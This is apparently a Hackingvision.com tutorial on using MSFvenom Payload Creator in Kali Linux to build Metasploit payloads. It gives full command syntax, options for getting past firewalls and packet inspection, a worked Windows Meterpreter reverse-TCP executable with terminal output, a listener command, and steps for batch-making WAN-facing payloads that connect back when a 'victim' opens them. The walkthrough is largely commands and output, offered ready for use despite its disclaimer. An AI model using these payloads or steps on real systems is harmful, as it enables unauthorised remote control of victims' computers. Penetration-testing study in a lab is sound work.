Create Metasploit Payload in Kali Linux MSFvenom Payload Creator (MSFPC)
Disclaimer
Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of Hackingvision.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
This site contains materials that can be potentially damaging or dangerous. If you do not fully understand please LEAVE THIS WEBSITE. Also be sure to check laws in your province/country before accessing Hackingvision.com.
Do not abuse this material. Be responsible.
All content posted on Hackingvision.com are for educational and research purposes only. Do not attempt to violate the law with anything contained here. Administrators of this server, the authors of this material, or anyone else affiliated in any way, are not going to accept responsibility for your actions. Neither the creator nor Hackingvision.com are responsible for the comments posted on this website.
By using the Website and its content, you accept that you will only lawfully use it in a test lab – with devices that you own or are allowed to conduct penetration tests on – to enhance your own knowledge. We do not endorse use of any information expressed on the Website outside of a lab environment.
MSFvenom Payload Creator (MSFPC v1.4.5)
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload. In this tutorial you will learn how to create MSFvenom payloads using MSF Payload Creator in Kali Linux. If you don’t already have Kali Linux you can download it from the link below.
Using MSFPC (MSFvenom Payload Creator) we can easily create payloads for multiple operating systems. MSFVenom Payload Creator can create the following types of payloads. APK, ASP, ASPX, Bash [.sh], Java [.jsp], Linux [.elf], OSX [.macho], Perl [.pl], PHP, Powershell [.ps1], Python [.py], Tomcat [.war], Windows [.exe // .exe // .dll].
MSFvenom Payload Creator comes pre-installed in Kali Linux you can find MSFPC under Show Applications > 13-SETools > msf payload creator
See usage below.
Usage:
/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example:
/usr/bin/msfpc windows 192.168.1.10 (Windows & manual IP.) /usr/bin/msfpc elf bind eth0 4444 (Linux, eth0's IP & manual port.) /usr/bin/msfpc stageless cmd py https (Python, stageless command prompt.) /usr/bin/msfpc verbose loop eth1 (A payload for every type, using eth1's IP.) /usr/bin/msfpc msf batch wan (All possible Meterpreter payloads, using WAN IP.) /usr/bin/msfpc help verbose (Help screen, with even more information.)
Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address. Missing <DOMAIN/IP> will default to the IP menu. Missing <PORT> will default to 443. <CMD> is a standard/native command prompt/terminal to interactive with. <MSF> is a custom cross platform shell, gaining the full power of Metasploit. Missing <CMD/MSF> will default to <MSF> where possible. <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target. <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target. Missing <BIND/REVERSE> will default to <REVERSE>. <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit. <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>. Missing <STAGED/STAGELESS> will default to <STAGED> where possible. <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs. <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80. <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443. <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>. Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>. <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGELESS> & <TCP + HTTP + HTTPS + FIND_PORT> <LOOP> will just create one of each <TYPE>. <VERBOSE> will display more information.
-
Can’t remember your IP for a interface? Don’t sweat it, just use the interface name:
eth0. -
Don’t know what your external IP is? MSFPC will discover it:
wan. -
Want to generate one of each payload? No issue! Try:
loop. -
Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try:
batch(for everything),batch msf(for every Meterpreter option),batch staged(for every staged payload), orbatch cmd stageless(for every stageless command prompt)!
Now you should be familiar with some options used by MSFVenom Payload Creator. We will now go through some of the various options.
First we will use MSFVenom Payload Creator to create a reverse TCP Metasploit payload for Windows Operating System.
Note: This will NOT try to bypass any anti-virus solutions at any stage.
Open up terminal in Kali Linux. In terminal enter command below. (Replace IP address with your local IP address)
/usr/bin/msfpc windows 192.168.1.10
Default port is 443 if you require another port add port after IP address in command.
Replace IP address with your local IP address you can find the local IP address your network interface is running on by opening up a new terminal and entering command.
ifconfig
You can find your local IP address under inet. My local IP address was 192.168.0.11 so the command I used looked like this.
/usr/bin/msfpc windows 192.168.0.11
Can’t remember your IP for a interface? Don’t sweat it, just use the interface name: eth0
Terminal Output:
root@kali:~# /usr/bin/msfpc windows 192.168.0.11 [*] MSFvenom Payload Creator (MSFPC v1.4.5) [i] IP: 192.168.0.11 [i] PORT: 443 [i] TYPE: windows (windows/meterpreter/reverse_tcp) [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.0.11 LPORT=443 > '/root/windows-meterpreter-staged-reverse-tcp-443.exe' [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting... [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe' [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done!
Payloads created by msf payload creator are stored in /root/.
When Msfvenom Payload Creator is ran a resource file is also saved to the same output location as our metasploit payload. A resource file is basically just a batch script for Metasploit using resource files we can automate various tasks in Metasploit.
To start a Metasploit listener for the payload we just created we can use Metasploit resource file that was output along with our Metasploit payload.
Command Example:
msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
Once victim machine tries to open .exe payload a reverse Metasploit connection will be established between the attacker and victim.
Now that you know how to create Windows payload let’s move on with this tutorial.
In the next part of this tutorial you will learn how to create all possible Meterpreter payloads, using WAN IP.
For the outside world to be able establish a connection back to our payload we must use our WAN IP address. If we use our Local IP Address only devices on the same network will be able to establish a reverse connection with our payload.
To create All possible Meterpreter payloads, using WAN IP open up a terminal and use command.
/usr/bin/msfpc msf batch wan
(Batch Mode will create a payload with as many different combinations as possible. Make sure that you have opened port that you are using for WAN payload in your network/router configuration or you won’t be able to establish a reverse connection with the victim device only over a Local connection.)
WAN stands for Wide-area network in computer networking a wide area network (WAN) is a network that exists over a large geographical area TCP/IP is often the protocol that is used for a wide-area network.
If you want to use MSFPC with an alternitive Linux Operating System you can install MSFPC from source using commands below.
$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpchttps://github.com/g0tmi1k/msfpc
Developer Credits: g0tmi1k – https://github.com/g0tmi1k/
You can check out g0tmi1k’s blog at https://blog.g0tmi1k.com/
https://hackingvision.com/2017/03/08/msfvenom-metasploit-commands/
